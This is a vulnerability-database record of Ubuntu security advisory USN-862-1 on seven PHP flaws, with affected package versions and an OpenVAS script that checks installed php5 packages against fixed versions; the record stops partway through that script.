{"id": "USN-862-1", "bulletinFamily": "unix", "title": "PHP vulnerabilities", "description": "Maksymilian Arciemowicz discovered that PHP did not properly validate \narguments to the dba_replace function. If a script passed untrusted input \nto the dba_replace function, an attacker could truncate the database. This \nissue only applied to Ubuntu 6.06 LTS, 8.04 LTS, and 8.10. (CVE-2008-7068)\n\nIt was discovered that PHP's php_openssl_apply_verification_policy \nfunction did not correctly handle SSL certificates with zero bytes in the \nCommon Name. A remote attacker could exploit this to perform a man in the \nmiddle attack to view sensitive information or alter encrypted \ncommunications. (CVE-2009-3291)\n\nIt was discovered that PHP did not properly handle certain malformed images \nwhen being parsed by the Exif module. A remote attacker could exploit this \nflaw and cause the PHP server to crash, resulting in a denial of service. \n(CVE-2009-3292)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce \nrestrictions in the tempnam function. An attacker could exploit this issue \nto bypass safe_mode restrictions. (CVE-2009-3557)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce \nrestrictions in the posix_mkfifo function. An attacker could exploit this \nissue to bypass open_basedir restrictions. (CVE-2009-3558)\n\nBogdan Calin discovered that PHP did not limit the number of temporary \nfiles created when handling multipart/form-data POST requests. A remote \nattacker could exploit this flaw and cause the PHP server to consume all \navailable resources, resulting in a denial of service. (CVE-2009-4017)\n\nATTENTION: This update changes previous PHP behaviour by limiting the \nnumber of files in a POST request to 50. This may be increased by adding a \n\"max_file_uploads\" directive to the php.ini configuration file.\n\nIt was discovered that PHP did not properly enforce restrictions in the \nproc_open function. An attacker could exploit this issue to bypass \nsafe_mode_protected_env_vars restrictions and possibly execute arbitrary \ncode with application privileges. (CVE-2009-4018)", "published": "2009-11-26T00:00:00", "modified": "2009-11-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://ubuntu.com/security/notices/USN-862-1", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3557", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3291", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3558", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3292", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-7068", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4018", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4017"], "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3557"], "type": "ubuntu", "lastseen": "2020-07-09T00:25:44", "edition": 5, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:64959", "OPENVAS:66320", "OPENVAS:66338", "OPENVAS:136141256231066420", "OPENVAS:1361412562310835236", "OPENVAS:835236", "OPENVAS:64958", "OPENVAS:136141256231066320", "OPENVAS:136141256231064959", "OPENVAS:66420"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2009-302.NASL", "PHP_5_2_12.NASL", "PHP_5_2_11.NASL", "FREEBSD_PKG_39A25A63EB5C11DEB65000215C6A37BB.NASL", "UBUNTU_USN-862-1.NASL", "MANDRIVA_MDVSA-2009-324.NASL", "MANDRIVA_MDVSA-2009-303.NASL", "PHP_5_3_1.NASL", "SLACKWARE_SSA_2010-024-02.NASL", "MANDRIVA_MDVSA-2009-247.NASL"]}, {"type": "cve", "idList": ["CVE-2009-4017", "CVE-2009-4018", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3557", "CVE-2009-3291", "CVE-2009-3558"]}, {"type": "f5", "idList": ["SOL13993", "F5:K13279", "SOL13279", "F5:K13993"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10417", "SECURITYVULNS:DOC:22822", "SECURITYVULNS:VULN:10269", "SECURITYVULNS:DOC:23018", "SECURITYVULNS:VULN:10505", "SECURITYVULNS:DOC:22520"]}, {"type": "freebsd", "idList": ["39A25A63-EB5C-11DE-B650-00215C6A37BB", "437A68CF-B752-11DE-B6EB-00E0815B8DA8"]}, {"type": "slackware", "idList": ["SSA-2009-276-02", "SSA-2010-024-02"]}, {"type": "redhat", "idList": ["RHSA-2010:0040"]}, {"type": "centos", "idList": ["CESA-2010:0040"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0040"]}, {"type": "seebug", "idList": ["SSV:12389", "SSV:19231", "SSV:14994"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1940-1:73225"]}, {"type": "exploitdb", "idList": ["EDB-ID:11636"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:85B6EA95447B86407811EF78E0844A44"]}], "modified": "2020-07-09T00:25:44", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-07-09T00:25:44", "rev": 2}, "vulnersScore": 7.6}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "packageVersion": "5.2.10.dfsg.1-2ubuntu6.3"}, {"OS": "Ubuntu", "OSVersion": "9.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "packageVersion": "5.2.6.dfsg.1-3ubuntu4.4"}, {"OS": "Ubuntu", "OSVersion": "6.06", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "packageVersion": "5.1.2-1ubuntu3.17"}, {"OS": "Ubuntu", "OSVersion": "8.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "packageVersion": "5.2.6-2ubuntu4.5"}, {"OS": "Ubuntu", "OSVersion": "8.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "packageVersion": "5.2.4-2ubuntu5.9"}, {"OS": "Ubuntu", "OSVersion": "6.06", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "packageVersion": "5.1.2-1ubuntu3.17"}, {"OS": "Ubuntu", "OSVersion": "8.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "packageVersion": "5.2.4-2ubuntu5.9"}, {"OS": "Ubuntu", "OSVersion": "9.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "packageVersion": "5.2.6.dfsg.1-3ubuntu4.4"}, {"OS": "Ubuntu", "OSVersion": "6.06", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "packageVersion": "5.1.2-1ubuntu3.17"}, {"OS": "Ubuntu", "OSVersion": "9.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "packageVersion": "5.2.6.dfsg.1-3ubuntu4.4"}, {"OS": "Ubuntu", "OSVersion": "9.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "packageVersion": "5.2.10.dfsg.1-2ubuntu6.3"}, {"OS": "Ubuntu", "OSVersion": "8.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "packageVersion": "5.2.6-2ubuntu4.5"}, {"OS": "Ubuntu", "OSVersion": "9.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "packageVersion": "5.2.10.dfsg.1-2ubuntu6.3"}, {"OS": "Ubuntu", "OSVersion": "8.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "packageVersion": "5.2.4-2ubuntu5.9"}, {"OS": "Ubuntu", "OSVersion": "8.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "packageVersion": "5.2.6-2ubuntu4.5"}], "scheme": null}

{"openvas": [{"lastseen": "2017-12-04T11:29:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3557"], "description": "The remote host is missing an update to php5\nannounced via advisory USN-862-1.", "modified": "2017-12-01T00:00:00", "published": "2009-12-03T00:00:00", "id": "OPENVAS:66338", "href": "http://plugins.openvas.org/nasl.php?oid=66338", "type": "openvas", "title": "Ubuntu USN-862-1 (php5)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_862_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_862_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-862-1 (php5)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libapache2-mod-php5 5.1.2-1ubuntu3.17\n php5-cgi 5.1.2-1ubuntu3.17\n php5-cli 5.1.2-1ubuntu3.17\n\nUbuntu 8.04 LTS:\n libapache2-mod-php5 5.2.4-2ubuntu5.9\n php5-cgi 5.2.4-2ubuntu5.9\n php5-cli 5.2.4-2ubuntu5.9\n\nUbuntu 8.10:\n libapache2-mod-php5 5.2.6-2ubuntu4.5\n php5-cgi 5.2.6-2ubuntu4.5\n php5-cli 5.2.6-2ubuntu4.5\n\nUbuntu 9.04:\n libapache2-mod-php5 5.2.6.dfsg.1-3ubuntu4.4\n php5-cgi 5.2.6.dfsg.1-3ubuntu4.4\n php5-cli 5.2.6.dfsg.1-3ubuntu4.4\n\nUbuntu 9.10:\n libapache2-mod-php5 5.2.10.dfsg.1-2ubuntu6.3\n php5-cgi 5.2.10.dfsg.1-2ubuntu6.3\n php5-cli 5.2.10.dfsg.1-2ubuntu6.3\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-862-1\";\n\ntag_insight = \"Maksymilian Arciemowicz discovered that PHP did not properly validate\narguments to the dba_replace function. If a script passed untrusted input\nto the dba_replace function, an attacker could truncate the database. This\nissue only applied to Ubuntu 6.06 LTS, 8.04 LTS, and 8.10. (CVE-2008-7068)\n\nIt was discovered that PHP's php_openssl_apply_verification_policy\nfunction did not correctly handle SSL certificates with zero bytes in the\nCommon Name. A remote attacker could exploit this to perform a man in the\nmiddle attack. (CVE-2009-3291)\n\nIt was discovered that PHP did not properly handle certain malformed images\nwhen being parsed by the Exif module. A remote attacker could exploit this\nflaw and cause the PHP server to crash, resulting in a denial of service.\n(CVE-2009-3292)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the tempnam function. An attacker could exploit this issue\nto bypass safe_mode restrictions. (CVE-2009-3557)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the posix_mkfifo function. An attacker could exploit this\nissue to bypass open_basedir restrictions. (CVE-2009-3558)\n\nBogdan Calin discovered that PHP did not limit the number of temporary\nfiles created when handling multipart/form-data POST requests. A remote\nattacker could exploit this flaw and cause the PHP server to consume all\navailable resources, resulting in a denial of service. (CVE-2009-4017)\n\nATTENTION: This update changes previous PHP behaviour by limiting the\nnumber of files in a POST request to 50. This may be increased by adding a\nmax_file_uploads directive to php.ini.\n\nIt was discovered that PHP did not properly enforce restrictions in the\nproc_open function. An attacker could exploit this issue to bypass\nsafe_mode_protected_env_vars restrictions and possibly execute arbitrary\ncode with application privileges. (CVE-2009-4018)\";\ntag_summary = \"The remote host is missing an update to php5\nannounced via advisory USN-862-1.\";\n\n \n\n\nif(description)\n{\n script_id(66338);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-03 22:10:42 +0100 (Thu, 03 Dec 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu USN-862-1 (php5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-862-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.2-1ubuntu3.17\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.4-2ubuntu5.9\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6-2ubuntu4.5\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", 